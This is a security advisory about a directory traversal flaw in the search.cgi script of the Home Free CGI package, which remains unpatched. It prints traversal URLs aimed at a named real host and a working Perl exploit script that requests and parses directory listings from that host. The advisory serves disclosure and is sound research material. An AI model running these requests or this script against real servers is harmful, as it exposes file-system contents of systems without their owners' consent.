COMMAND
search.cgi
SYSTEMS AFFECTED
SolutionScripts.com Home Free CGI package
PROBLEM
Following is based on #!/bin/csh security advisory.
SolutionScripts.com is a vendor of Perl CGI scripts for all
platforms that support the language (WinNT, Linux, various Unix
flavors). Home Free is a package developed and marketed by
SolutionScripts.com, below is an extract from their website.
"Home Free is the ultimate community building program.
Allowing you to give your visitors a free web site on your
server. With complete control over every aspect of your free
web site program, you can grow page views, revenue and brand
awareness for your site."
http://solutionscripts.com/vault/homefree/index.shtml
Home Free is used by many popular websites. It allows users to
set up and maintain their websites through a series of CGI scripts
without posing a threat to system security. Home Free consists of
the following files from an end-user point of view:
./features.cgi
./new.cgi
./search.cgi
./signup.cgi
./user_files.cgi
./user_formmail.cgi
./user_ftp_import.cgi
./user_gbook.cgi
./user_manage.cgi
./user_pref.cgi
./user_uploads.cgi
./user_wwwboard.cgi
There are also various 'admin' CGI scripts in the package, such
as:
./admin.cgi
./admin_browse.cgi
./admin_cata.cgi
./admin_email.cgi
./admin_features.cgi
./admin_setup.cgi
./admin_update.cgi
The search.cgi script uses the following input variables:
letter=any string
cata=any string
perpage=any string
start=any string
boolean=or/and
advanced
This CGI script can be exploited to view directory listings on the
host server. A vulnerability exists because of insufficient
bounds checking of the 'letter' variable when it is parsed by
the search.cgi script, for example:
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\winnt
The above URL will list the \winnt directory of the host. The
search.cgi script also seems to read and display the first line
of each file (network.wri, et al). Those who found this
vulnerability have been unable to use the search.cgi script or
any of the other scripts in the package to view files to date.
You can also exploit the vulnerability to view other directory
listings, such as the /cgi-bin directory under Apache.
http://members.antionline.com/cgi-bin/search.cgi?letter=..\..\..\..\apache\cgi-bin
#!/bin/csh also took the time in writing a short Perl script to
display the directory listings of vulnerable servers:
#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
# Default server is antionline's, change as appropriate.
#
use IO::Socket;
if ($ARGV[0] eq "") { die "no argument\n"; }
$asoc = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "members.antionline.com",
PeerPort => 80) ||
die "can't connect to host: $!";
select($asoc);
$| = 1;
print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";
while(<$asoc>) {
if ($_ =~ /.+HREF.+TD.+/) {
@parts = split("\"", $_);
$foo = $parts[1];
@parts = split("/", $foo);
print STDOUT $parts[3];
print STDOUT "\n";
}
}
close(ASOC);
Other smaller problems were identified when testing the bounds
checking and flexibility of the other scripts, such as
user_manage.cgi. Without access to the source code of the Perl
scripts in question, it is very difficult to know the security
implications of such problems.
SOLUTION
Nothing yet.